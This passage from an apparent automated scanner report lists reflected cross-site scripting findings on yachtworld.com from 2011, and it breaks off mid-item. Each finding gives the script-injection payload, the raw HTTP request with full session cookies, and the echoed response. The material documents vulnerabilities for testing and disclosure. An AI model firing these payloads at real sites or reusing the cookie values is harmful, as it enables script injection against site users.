Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:34:23 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/transitional.dtd">

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN">

<html la
...[SNIP]...
<a href="/core/uk/listing/yw_listing_search_error.jsp??82cf6"><script>alert(1)</script>38b55a9b8a4=1">
...[SNIP]...

3.417. http://www.yachtworld.com/core/listing/photoGallery.jsp [units parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/photoGallery.jsp

Issue detail

The value of the units request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 981d1><script>alert(1)</script>ec21d48cf4f was submitted in the units parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet981d1><script>alert(1)</script>ec21d48cf4f&seo=0&checked_boats=2266476&boat_id=2266476&back=/core/boats/2006/32-Regulator-With-Trailer-**reduced**-2266476/Destin/FL/United-States&boat_id=2266476 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:34:22 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Mon, 24 Jan 2011 21:44:50 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>
...[SNIP]...
<a href=/core/listing/boatDetails.jsp?boat_id=2266476&checked_boats=2266476&ybw=&units=Feet981d1><script>alert(1)</script>ec21d48cf4f&currency=USD&access=Public&listing_id=53549&url=>
...[SNIP]...

3.418. http://www.yachtworld.com/core/listing/photo_gallery.jsp [boat_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/photo_gallery.jsp

Issue detail

The value of the boat_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cc2a1'%3balert(1)//48fa37107c6 was submitted in the boat_id parameter. This input was echoed as cc2a1';alert(1)//48fa37107c6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /core/listing/photo_gallery.jsp?slim=broker&lang=en&ywo=starlingmarine&hosturl=starlingmarine&units=Feet&id=2047906&back=/core/listing/pl_boat_detail.jsp&boat_id=2047906cc2a1'%3balert(1)//48fa37107c6 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 500 Internal Server Error
Date: Thu, 27 Jan 2011 20:31:52 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<br>'+ 'ExceptionMessage: For input string: "2047906cc2a1';alert(1)//48fa37107c6"<br>
...[SNIP]...

3.419. http://www.yachtworld.com/core/listing/photo_gallery.jsp [hosturl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/photo_gallery.jsp

Issue detail

The value of the hosturl request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload efbca><script>alert(1)</script>29e0ea4a2dd was submitted in the hosturl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /core/listing/photo_gallery.jsp?slim=broker&lang=en&ywo=starlingmarine&hosturl=starlingmarineefbca><script>alert(1)</script>29e0ea4a2dd&units=Feet&id=2047906&back=/core/listing/pl_boat_detail.jsp&boat_id=2047906 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:31:01 GMT
Server: Apache
Cache-Control: private
Content-Length: 5985
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!-- /opt/weblogic/waeyw/ywcluster/public_html/broker_pages/starlingmarineefbca><script>alert(1)</script>29e0ea4a2dd/boats.header.html:/opt/weblogic/waeyw
...[SNIP]...
<a href=/core/listing/pl_boat_detail.jsp?slim=broker&boat_id=2047906&checked_boats=2047906&hosturl=starlingmarineefbca><script>alert(1)</script>29e0ea4a2dd&&ywo=starlingmarine&&ybw=&units=Feet&access=Public&listing_id=76926&url=>
...[SNIP]...

3.420. http://www.yachtworld.com/core/listing/photo_gallery.jsp [hosturl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/photo_gallery.jsp

Issue detail

The value of the hosturl request parameter is copied into an HTML comment. The payload 42f89--><script>alert(1)</script>33f60853b38 was submitted in the hosturl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /core/listing/photo_gallery.jsp?slim=broker&lang=en&ywo=starlingmarine&hosturl=starlingmarine42f89--><script>alert(1)</script>33f60853b38&units=Feet&id=2047906&back=/core/listing/pl_boat_detail.jsp&boat_id=2047906 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:31:14 GMT
Server: Apache
Cache-Control: private
Content-Length: 5995
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<script>alert(1)</script>33f60853b38/boats.header.html:/opt/weblogic/waeyw/ywcluster/public_html/broker_pages/starlingmarine42f89-->
...[SNIP]...

3.421. http://www.yachtworld.com/core/listing/photo_gallery.jsp [hosturl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/photo_gallery.jsp

Issue detail

The value of the hosturl request parameter is copied into the HTML document as plain text between tags. The payload f9bce<script>alert(1)</script>8e02e871271 was submitted in the hosturl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

